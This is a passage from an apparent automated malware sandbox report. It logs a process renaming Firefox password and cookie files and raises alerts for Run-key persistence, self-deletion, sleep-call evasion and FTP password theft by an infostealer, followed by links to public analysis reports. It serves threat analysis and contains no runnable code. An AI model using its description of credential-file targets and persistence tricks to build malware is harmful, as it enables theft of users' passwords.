  13338. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13339.   signons2.txt
  13340.  MD5:  16f880df029212dc5b83869b7b89d07a
  13341.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13342.     828     574
  13343. File   
  13344. Rename
  13345.    
  13346. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13347.   signons2.txt
  13348. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13349.   signons2.txt.vvv
  13350.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13351.  MD5:  16f880df029212dc5b83869b7b89d07a
  13352.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13353.     828     574
  13354. File   
  13355. Open
  13356.    
  13357. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13358.   signons3.txt
  13359.     828     157
  13360. File   
  13361. Close
  13362.    
  13363. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13364.   signons3.txt
  13365.  MD5:  16f880df029212dc5b83869b7b89d07a
  13366.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13367.     828     574
  13368. File   
  13369. Rename
  13370.    
  13371. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13372.   signons3.txt
  13373. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\
  13374.   signons3.txt.vvv
  13375.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13376.  MD5:  16f880df029212dc5b83869b7b89d07a
  13377.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13378.     828     574
  13379. File   
  13380. Open
  13381.    
  13382. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\
  13383.   cookies.txt
  13384.     828     157
  13385. File   
  13386. Close
  13387.    
  13388. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\
  13389.   cookies.txt
  13390.  MD5:  16f880df029212dc5b83869b7b89d07a
  13391.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13392.     828     574
  13393. File   
  13394. Rename
  13395.    
  13396. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\
  13397.   cookies.txt
  13398. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\
  13399.   cookies.txt.vvv
  13400.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  13401.  MD5:  16f880df029212dc5b83869b7b89d07a
  13402.  SHA1: 642095a1581aa5774062df3733909a9660885430
  13403.     828     574
  13404. 38 Repeated items skipped
  13405. Malicious  Alert   
  13406. High Repeated Sleep Calls
  13407.    
  13408. Message:   High repeated sleep calls    Detail:   High repeated number of sleep calls  
  13409.              
  13410. 23 Repeated items skipped
  13411. High  Cpu  
  13412.    
  13413.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe
  13414.     1240         
  13415. Malicious  Alert   
  13416. Suspicious  Persistance  Activity
  13417.    
  13418. Message:   New file in AppData added to Run regkey    Detail:   Process drops a file in AppData then adds to Run regkey  
  13419.              
  13420. Malicious  Alert   
  13421. Generic  Anomalous  Activity
  13422.    
  13423. Message:   Process Opening explorer    Detail:   Process Opening Explorer  
  13424.              
  13425. Malicious  Alert   
  13426. Misc  Anom
  13427.    
  13428. Message:   Process Open with Root process deleted    Detail:   Process deleting itself  
  13429.              
  13430. Malicious  Alert   
  13431. Suspicious  Persistance  Activity
  13432.    
  13433. Message:   Startup services added for file    Detail:   Process adding itself (non-DLL) to windows startup areas for file  
  13434.              
  13435. Malicious  Alert   
  13436. Data  Theft  Activity
  13437.    
  13438. Message:   Firefox FTP password theft    Detail:   Process stealing FTP password via registry  
  13439.              
  13440. Malicious  Alert   
  13441. Misc  Anom
  13442.    
  13443. Message:   Infostealer detected    Detail:   Infostealer detected    
  13444.  
  13445.  
  13446. https://www.hybrid-analysis.com/sample/b43eb03c3df9db7399d108a19101f8541c4e905c20cd634927796c02da6fbc16?environmentId=4 – opexxx on Dec. 3, 2015, 4:10 a.m.
  13447. http://www.threatexpert.com/report.aspx?md5=446071be407efeb4e0d7c83bb504774a – opexxx on Dec. 3, 2015, 4:15 a.m.
  13448. https://malwr.com/analysis/MTUxMmM0MGRmOWIyNDY2ZmFkNmZmM2RhMmFiYjEzMzA/ – opexxx on Dec. 3, 2015, 4:18 a.m.
  13449. https://sandbox.deepviz.com/report/rk/a1b274443a5774dd92559735dff0cfa7d99f086f4e9a4f165d8336e253bb2dba48527f13a0933a8e78d6452b95413427e505e8a9e0db80b218a01a165d232938/ – opexxx on Dec. 3, 2015, 4:18 a.m.
  13450. http://pedump.me/446071be407efeb4e0d7c83bb504774a/ – opexxx on Dec. 3, 2015, 4:20 a.m.
  13451. http://whitelist.kaspersky.com/advisor#search/446071BE407EFEB4E0D7C83BB504774A – opexxx on Dec. 3, 2015, 4:23 a.m.
  13452. https://malwr.com/analysis/MTUxMmM0MGRmOWIyNDY2ZmFkNmZmM2RhMmFiYjEzMzA/
Add Comment
Please, Sign In to add comment